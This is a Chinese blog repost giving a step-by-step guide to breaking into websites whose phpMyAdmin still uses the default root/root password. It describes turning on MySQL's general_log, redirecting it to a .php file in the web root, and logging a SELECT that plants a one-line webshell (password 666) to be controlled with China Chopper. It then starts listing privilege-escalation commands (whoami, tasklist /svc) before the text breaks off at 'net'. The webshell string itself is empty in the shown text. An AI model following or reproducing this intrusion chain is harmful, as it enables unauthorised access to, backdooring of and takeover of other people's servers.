黑客入侵数据库指令(弱口令) - 技术分享 - 五行资源分享网

黑客入侵数据库指令(弱口令)

作者头像图片

作者: 五行

网络资源搬砖的爱好者

文章二维码手机扫码查看

特别声明:文章多为网络转载,资源使用一般不提供任何帮助,如有侵权请联系!

phpMyAdmin弱口令,从数据库杀到内网一条龙
超超超超超详细

ps:不混娱乐圈,mors是我大哥,不服喷他

什么是phpMyAdmin?

phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。

以上这些都不重要,重要的是能干什么?

phpMyAdmin在配置的时候,如果不去修改,默认账号密码就是root/root
什么?你问我他为什么不去修改?
不是每个人都懂这些的好吧?
看看有多少傻瓜式搭建网站的帖子就知道了
当初在帮别人改代码的时候
惊奇的发现源码里面有木马!
更可笑的是,还跟我说是特意这样写的!
着实把我逗笑了
偏偏小白们还看不出来

好了好了,言归正传

弱口令进了数据库我们能干嘛呢?
当然是拿shell啊

先找网站的根目录
一个是是否开启,一个是写入路径
general_log 一般是off,改成on
general_log_file C:\phpStudy\WWW\log.php
改成你喜欢的名字,比如:
general_log_file C:\phpStudy\WWW\123.php

执行一句话:
select ;
这样木马就被写入了123.php里面
密码是666,菜刀连接
原理就是,你执行的sql语句会被日志记录下来

拿到shell之后呢?当然是提权啦!
用shell打开虚拟终端
1.whoami看看啥权限
(有的是system权限,还有的可能是Administrator,还有比较鸡贼的,看似是Administrator,实际权限低的可怜)

2.tasklist /svc 找远程服务(Windows远程服务名称为:TermService)记录PID

3.net

 

黑客入侵数据库指令(弱口令)-五行资源分享网-第1张图片

本文最后更新于2022-6-30,已超过 1 年没有更新,如果文章内容或图片资源失效,请留言反馈,我们会及时处理,谢谢!
分享到:
打赏
未经允许不得转载:

作者: 五行, 转载或复制请以 超链接形式 并注明出处 五行资源分享网
原文地址: 《黑客入侵数据库指令(弱口令)》 发布于2022-6-30 13:21
帖子声明: 本站对文章进行整理、排版、编辑,是出于传递信息之目的, 并不意味着赞同其观点或证实其内容的真实性,不拥有所有权,不承担相关法律责任。

评论

在线链接输入图片 打卡按钮图片 私密评论按钮图片 60 + 42 =
乱评论、多次评论者一律禁言帐号或封禁IP
本站已经全面开启缓存,评论查看隐藏内容需等待1分钟后再刷新本页!

 

觉得文章有用就打赏一下文章作者

微信扫一扫打赏

打赏图片